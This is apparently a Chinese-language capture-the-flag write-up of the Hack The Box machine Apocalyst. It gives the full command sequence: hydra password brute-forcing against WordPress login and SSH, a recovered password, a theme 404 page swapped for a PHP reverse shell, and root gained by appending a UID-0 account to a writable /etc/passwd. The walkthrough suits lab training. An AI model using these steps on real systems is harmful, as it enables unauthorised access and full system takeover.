Apocalyst(CTF-like)

发表于 | 分类于 | 阅读数 
1
2
3
4
5
6
7
8
9
10
 
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
|   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apocalypse Preparation Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 访问发现很慢
  • wget http://10.10.10.46 ,发现一个域名
  • echo 10.10.10.46 apocalyst.htb >> /etc/hosts
  • 访问http://apocalyst.htb 
1
2
3
4
5
6
7
8
9
10
11
12
 
wpscan --url 10.10.10.46 --enumerate
Scan Aborted: Unable to identify the wp-content dir, please supply it with --wp-content-dir
于是用域名作为地址扫描
---
wpscan --url apocalyst.htb --enumerate
[!] 27 vulnerabilities identified:
---
wpscan --url 10.10.10.46 --enumerate p --enumerate u
wpscan --url http://apocalyst.htb/ --plugins-detection aggressive
gobuster -u http://10.10.10.46 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
---
searchsploit wordpress twentyseventeen

info

WordPress version 4.8 http://apocalyst.htb/wp-login.php 用户名:falaraki 没有发现任何插件

1
2
3
4
5
6
7
8
9
10
11
 
cd /usr/share/seclists/

hydra -l falaraki -P /usr/share/wordlists/500-worst-passwords.txt -f apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:ERROR"

hydra -l falaraki -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.46 ssh

hydra -l falaraki -P /usr/share/wordlists/3000-pass.txt -f apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:ERROR"
弱密码未发现

wpscan --url http://apocalyst.htb/wp-login.php --wordlist /usr/share/wordlists/500-worst-passwords.txt --username falaraki
失败

CVE-2019-8942:需要一个author用户,才能远程代码执行

确认漏洞

  • 目录遍历:
1
2
 
http://apocalyst.htb/wp-content/uploads/2017/07/
http://apocalyst.htb/wp-content/upgrade/

writeup

1

steghide extract -sf image.jpg

扫描web时候,发现很多网页301跳转到一张图片。通过隐藏术,提取一个list.txt,然后暴力破解就得到口令登陆web后台。

1
2
3
4
 
wpscan --url http://10.10.10.46 --wordlist /root/Desktop/46/wordlist.txt --username falaraki
wpscan版本更新后,不支持--wordlist参数了,顺便提一句,我讨厌暴力破解

hydra -l falaraki -P /root/Desktop/46/wordlist.txt -f apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:ERROR"

falaraki/Transclisiation

appearance-editor-修改404.php为php-reverse-shell.php,然后访问一个不存在的页面 apocalyst.htb/?p=9999

get webshell: www-data

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 
/usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/bash")'

ls -al /etc/passwd
发现可读可写权限

openssl生成密文
openssl passwd -help
openssl passwd -1 -salt ippsec hackthebox

echo "ippsec:\$1\$ippsec\$bO.JNJVLhnoduioFs74jX1:0:0:root:/root:/bin/bash" >> /etc/passwd

注意$字符需要\转义,否则不会写入passwd文件

su ippsec
hackthebox

总结

以后遇到ctf-like的靶机都绕着走。 2